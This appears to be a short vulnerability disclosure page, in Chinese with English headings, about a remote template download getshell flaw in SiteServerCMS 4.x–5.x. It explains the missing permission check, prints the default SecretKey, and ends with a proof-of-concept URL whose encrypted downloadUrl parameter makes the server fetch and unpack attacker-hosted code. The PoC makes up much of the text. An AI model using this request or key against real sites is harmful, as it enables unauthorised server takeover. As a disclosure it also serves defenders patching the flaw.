SiteServerCMS-Remote-download-Getshell-vulnerability
SiteServerCMS 远程模板下载Getshell漏洞
avatar
漏洞缺陷是由于后台模板下载位置未对用户权限进行校验,且 ajaxOtherService中的downloadUrl参数可控,导致getshell,目前经过测试发现对5.0版本包含5.0以下通杀.先调用了DecryptStringBySecretKey函数将downloadurl先进行了解密,之后调用SiteTemplateDownload函数进行模板下载并自解压。
且SecretKey在5.0是默认值
vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5
References
Author:1u0hun
简记野生应急捕获到的siteserver远程模板下载Getshell漏洞
Affected Version
SiteServerCMS 5.x
SiteServerCMS 4.x(测试没通过)
PoC
Author:We1h0@PoxTeam
http://localhost/SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=aZlBAFKTavCnFX10p8sNYfr9FRNHM0slash0XP8EW1kEnDr4pNGA7T2XSz0yCY0add0MS3NiuXiz7rZruw8zMDybqtdhCgxw7u0ZCkLl9cxsma6ZWqYd0G56lB6242DFnwb6xxK4AudqJ0add0gNU9tDxOqBwAd37smw0equals00equals0&director